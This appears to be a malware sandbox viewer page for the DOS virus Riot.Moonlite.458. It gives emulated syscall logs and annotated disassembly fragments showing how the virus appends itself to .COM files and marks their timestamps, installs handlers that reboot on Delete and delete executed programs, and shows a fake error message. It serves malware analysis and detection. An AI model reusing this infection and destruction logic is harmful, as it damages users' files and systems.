Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.458


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:50.996071431Z 26 PC: 12a82 | Set disk transfer address
2018-12-17T22:57:50.997749522Z 78 PC: 12a8d | Find first file
2018-12-17T22:57:51.003551959Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.018623287Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:51.030006879Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.036464739Z 66 PC: 12aca | Move file pointer
; Disassembly window printed by the viewer at the return address of the
; Get time call (INT 21h, op 44 = AH=2Ch). It is a linear window, not a whole
; routine: it starts mid-sequence and stops before the next INT 21h.
; The log rows that follow it (PC 12a59, 12ae8, 12af3, 12b06, 12b0a) are the
; calls made by the instructions shown here.
2018-12-17T22:57:51.038027767Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
; ^ stores DX as returned by Get time (DH = seconds, DL = hundredths);
;   what the stored word is used for is not visible in this window.
0x12add: call 0x22a4b                       ; next logged call is the 458-byte write at PC 12a59, so the real target is presumably 0x12a4b (16-bit IP wraparound not applied by the disassembler) - confirm
0x12ae0: cdq                                ; opcode 0x99 is CWD in 16-bit code: DX = sign extension of AX
0x12ae1: sub cx, cx                         ; CX = 0 (high word of the seek offset)
0x12ae3: mov ax, 0x4200                     ; AH=42h move file pointer, AL=00h = from start of file
0x12ae6: int 0x21                           ; logged below as "Move file pointer" (PC 12ae8); offset is CX:DX, presumably 0 - DX depends on AX after the call
0x12ae8: lea dx, word ptr [bp + 0x2ca]      ; DS:DX = 3-byte buffer at bp+0x2ca
0x12aec: mov cx, 3                          ; length 3, same size as the earlier "Read 3 bytes"
0x12aef: mov ah, 0x40                       ; AH=40h write file
0x12af1: int 0x21                           ; logged below as "Write 3 bytes on handle 5" (PC 12af3)
0x12af3: mov dx, word ptr [bp + 0x2ed]      ; DX = file date word to set
0x12af7: mov cx, word ptr [bp + 0x2eb]      ; CX = file time word to set
0x12afb: and cl, 0xe0                       ; clear the low 5 bits of the time word (the seconds/2 field)
0x12afe: or cl, 0x15                        ; force seconds field to 0x15 = 21 two-second units = 42 s on every file written; usable as a triage indicator
0x12b01: mov ax, 0x5701                     ; AH=57h file date/time, AL=01h = set
0x12b04: int 0x21                           ; logged below as "Get or set file date and time" (PC 12b06)
0x12b06: mov ah, 0x3e                       ; AH=3Eh close file
0x12b08: int 0x21                           ; logged below as "Close file" (PC 12b0a)
0x12b0a: lea dx, word ptr [bp + 0x2f3]      ; DS:DX = buffer at bp+0x2f3; presumably the file name for the attribute call logged at PC 12b19 - the call itself is outside this window
0x12b0e: sub cx, cx                         ; CX = 0; window ends here
2018-12-17T22:57:51.041430517Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.053604427Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.05464795Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.060019237Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.061562152Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.06947794Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.079187393Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.085449705Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.095072594Z 61 PC: 12ab6 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:51.101789576Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.109694111Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.111278518Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.113898863Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.118024025Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.119621261Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.122455475Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.124802477Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.132346824Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.142051313Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.145261355Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.154923312Z 61 PC: 12ab6 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:51.161611243Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.168480458Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.17006181Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.172417053Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.181008847Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.182891212Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.189419316Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.191169142Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.19974596Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.209676346Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.212578871Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.223222243Z 61 PC: 12ab6 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:51.230082508Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.236557986Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.239941313Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.24285699Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.245941841Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.248294435Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.251406875Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.253117899Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.260600305Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.270774754Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.273628646Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.283743965Z 61 PC: 12ab6 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:51.29051052Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.297743011Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.301937544Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.305348205Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.308205584Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.309660554Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.313977126Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.315448257Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.323074622Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.340037909Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.343603751Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.355883752Z 61 PC: 12ab6 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:51.364442789Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.371877116Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.374578879Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.379370844Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.389116335Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.390774745Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.398189053Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.399957445Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.408954228Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.427749285Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.430891536Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.447192407Z 61 PC: 12ab6 | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:51.456218132Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.463012497Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.464378205Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.467100058Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.469198475Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.470298364Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.472360841Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.474207838Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.484343284Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.492483639Z 79 PC: 12a8d | Find next file
2018-12-17T22:57:51.495124525Z 67 PC: 12aad | Get or set file attributes
2018-12-17T22:57:51.503769546Z 61 PC: 12ab6 | Open file (Filename = 'TEST.COM')
2018-12-17T22:57:51.508749714Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:51.514707727Z 66 PC: 12aca | Move file pointer
2018-12-17T22:57:51.516213136Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-17T22:57:51.518039696Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-17T22:57:51.524170725Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:57:51.525418363Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:51.531031789Z 87 PC: 12b06 | Get or set file date and time
2018-12-17T22:57:51.532981659Z 62 PC: 12b0a | Close file
2018-12-17T22:57:51.540703578Z 67 PC: 12b19 | Get or set file attributes
2018-12-17T22:57:51.550807528Z 79 PC: 12a8d | Find next file
; Disassembly window printed by the viewer at the return address of the
; Get date call (INT 21h, op 42 = AH=2Ah). The window is linear and runs
; across what appear to be three separate pieces of code: the date check at
; 0x12b1f, code at 0x12b30 and code at 0x12b43. It stops mid-sequence.
; In this run the next logged call is "Set disk transfer address" at PC 12b96
; and no "Display string" is logged, so the message path was not taken.
; NOTE(review): the JSON printed after this log gives "Day":1; how that value
; reaches DL in the emulator is not shown on the page.
2018-12-17T22:57:51.554626011Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
; ^ DL = day of month as returned by Get date.
0x12b22: je 0x12b26                         ; day == 1: take the message path
0x12b24: jmp 0x12b8d                        ; any other day: skip it (target is outside this window)
0x12b26: mov ah, 9                          ; AH=09h display '$'-terminated string
0x12b28: lea dx, word ptr [bp + 0x2a9]      ; DS:DX = string at bp+0x2a9
0x12b2c: int 0x21                           ; the run on this page that takes this path logs 'Bad command or filename' at PC 12b2e
0x12b2e: jmp 0x12b5a                        ; target outside this window; in that run the get/set interrupt vector calls and "Terminate and stay resident" follow
; 0x12b30 is not reached by fall-through from the jmp above. It reads the
; keyboard port, so it is presumably the handler installed for interrupt 9
; (keyboard) - the set-vector arguments are not shown, confirm.
0x12b30: push ax                            ; preserve AX for the chained handler
0x12b31: in al, 0x60                        ; read the scan code from the keyboard controller data port
0x12b33: cmp al, 0x53                       ; 0x53 = Delete key make code
0x12b35: je 0x12b3d                         ; Delete pressed: go to the far jump below
0x12b37: pop ax                             ; other keys: restore AX
0x12b38: ljmp ptr cs:[0x2cd]                ; chain through the far pointer stored at cs:0x2cd, presumably the saved original vector
0x12b3d: ljmp 0xffff:0                      ; FFFF:0000 is the CPU reset entry point, i.e. the machine restarts (AX pushed above is never popped on this path)
0x12b42: iret                               ; not reached from the two far jumps above
; 0x12b43 compares AX with an INT 21h function code, so it is presumably the
; handler installed for interrupt 33 (= 21h, DOS services) - confirm.
0x12b43: cmp ax, 0x4b00                     ; AX=4B00h = load and execute program
0x12b46: jne 0x12b4c                        ; other requests skip the two instructions below
0x12b48: mov ah, 0x41                       ; AH=41h delete file; DX is not changed here, so DS:DX is presumably still the path passed to the exec request
0x12b4a: int 0x21                           ; issue the delete
0x12b4c: cmp ax, 0x4b9f                     ; window ends here; the branch that uses this compare and the meaning of 4B9Fh are not shown
2018-12-17T22:57:51.557226966Z 26 PC: 12b96 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.774564605Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.775840447Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.785344402Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.799732968Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.809074247Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.814270132Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.815358052Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.81712066Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.834630043Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.835819776Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:35:58.840874731Z 87 PC: 12b06 | Get or set file date and time
2018-12-25T12:35:58.843708081Z 62 PC: 12b0a | Close file
2018-12-25T12:35:58.852302681Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:35:58.859241423Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.861738958Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.869596451Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.876173008Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.881242879Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.882749504Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.884537513Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.886716151Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.888371355Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.890229734Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.891677626Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.89911627Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.9092534Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.914021149Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.927139478Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:58.935178572Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:58.942756548Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:58.945194913Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:58.948247666Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:58.958280606Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:58.961531381Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:58.969330823Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:58.971146973Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:58.980300384Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:58.988633114Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:58.990598749Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:58.997861127Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.006118161Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.012673148Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.014079368Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.016634381Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.01881366Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.020004484Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.02298419Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.024286652Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.03030457Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.038952395Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.043006206Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.054480693Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.063130268Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.070797223Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.072926232Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.076097711Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.080390666Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.081996246Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.084997191Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.087825515Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.098430373Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.109685057Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.113853655Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.125559819Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.133327071Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.14590423Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.147822833Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.151020455Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.16535842Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.167385127Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.175501971Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.177802125Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.187420612Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.199378356Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.202562081Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.214673829Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.224265549Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.232145842Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.234620762Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.237762387Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.241505964Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.244676529Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.248038939Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.250139925Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.259758325Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.271574812Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.27500483Z 67 PC: 12aad | Get or set file attributes (See above)
2018-12-25T12:35:59.287762555Z 61 PC: 12ab6 | Open file (See above)
2018-12-25T12:35:59.296028354Z 63 PC: 12ac2 | Read file or device (See above)
2018-12-25T12:35:59.304188664Z 66 PC: 12aca | Move file pointer (See above)
2018-12-25T12:35:59.306226757Z 44 PC: 12ad9 | Get time (See above)
2018-12-25T12:35:59.310491686Z 64 PC: 12a59 | Write file or device (See above)
2018-12-25T12:35:59.320009412Z 66 PC: 12ae8 | Move file pointer (See above)
2018-12-25T12:35:59.322007152Z 64 PC: 12af3 | Write file or device (See above)
2018-12-25T12:35:59.330962717Z 87 PC: 12b06 | Get or set file date and time (See above)
2018-12-25T12:35:59.333041358Z 62 PC: 12b0a | Close file (See above)
2018-12-25T12:35:59.342310223Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:35:59.355741301Z 79 PC: 12a8d | Find next file (See above)
2018-12-25T12:35:59.359274263Z 42 PC: 12b1f | Get date 0x12b1f: cmp dl, 1
0x12b22: je 0x12b26
0x12b24: jmp 0x12b8d
0x12b26: mov ah, 9
0x12b28: lea dx, word ptr [bp + 0x2a9]
0x12b2c: int 0x21
0x12b2e: jmp 0x12b5a
0x12b30: push ax
0x12b31: in al, 0x60
0x12b33: cmp al, 0x53
0x12b35: je 0x12b3d
0x12b37: pop ax
0x12b38: ljmp ptr cs:[0x2cd]
0x12b3d: ljmp 0xffff:0
0x12b42: iret
0x12b43: cmp ax, 0x4b00
0x12b46: jne 0x12b4c
0x12b48: mov ah, 0x41
0x12b4a: int 0x21
0x12b4c: cmp ax, 0x4b9f
2018-12-25T12:35:59.362184314Z 9 PC: 12b2e | Display string (String= 'Bad command or filename')
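2018-12-25T12:35:59.366074376Z 53 PC: 12b5f | Get interrupt vector (Interrupt = '9' = INT 09h, the keyboard hardware interrupt; the viewer's 'Display string' label is the name of INT 21h function 09h and does not apply to a vector number)
2018-12-25T12:35:59.368264832Z 37 PC: 12b71 | Set interrupt vector (Interrupt = '9' = INT 09h, the keyboard hardware interrupt; not 'Display string')
2018-12-25T12:35:59.369983676Z 53 PC: 12b76 | Get interrupt vector (Interrupt = '33' = INT 21h, the DOS services interrupt; the viewer's 'Random read' label is the name of INT 21h function 21h and does not apply to a vector number)
2018-12-25T12:35:59.371751634Z 37 PC: 12b88 | Set interrupt vector (Interrupt = '33' = INT 21h, the DOS services interrupt; not 'Random read')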
2018-12-25T12:35:59.374613236Z 49 PC: 12b8d | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12688,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.794314367Z 26 PC: 12a82 | Set disk transfer address
2018-12-25T12:35:58.796138201Z 78 PC: 12a8d | Find first file
2018-12-25T12:35:58.802567116Z 67 PC: 12aad | Get or set file attributes
2018-12-25T12:35:58.81774094Z 61 PC: 12ab6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.824796091Z 63 PC: 12ac2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:35:58.831788455Z 66 PC: 12aca | Move file pointer
2018-12-25T12:35:58.832789108Z 44 PC: 12ad9 | Get time 0x12ad9: mov word ptr [bp + 0x11d], dx
0x12add: call 0x22a4b
0x12ae0: cdq
0x12ae1: sub cx, cx
0x12ae3: mov ax, 0x4200
0x12ae6: int 0x21
0x12ae8: lea dx, word ptr [bp + 0x2ca]
0x12aec: mov cx, 3
0x12aef: mov ah, 0x40
0x12af1: int 0x21
0x12af3: mov dx, word ptr [bp + 0x2ed]
0x12af7: mov cx, word ptr [bp + 0x2eb]
0x12afb: and cl, 0xe0
0x12afe: or cl, 0x15
0x12b01: mov ax, 0x5701
0x12b04: int 0x21
0x12b06: mov ah, 0x3e
0x12b08: int 0x21
0x12b0a: lea dx, word ptr [bp + 0x2f3]
0x12b0e: sub cx, cx
2018-12-25T12:35:58.834834442Z 64 PC: 12a59 | Write file or device (Write 458 bytes on handle 5)
2018-12-25T12:35:58.843762184Z 66 PC: 12ae8 | Move file pointer
2018-12-25T12:35:58.84508354Z 64 PC: 12af3 | Write file or device (Write 3 bytes on handle 5)
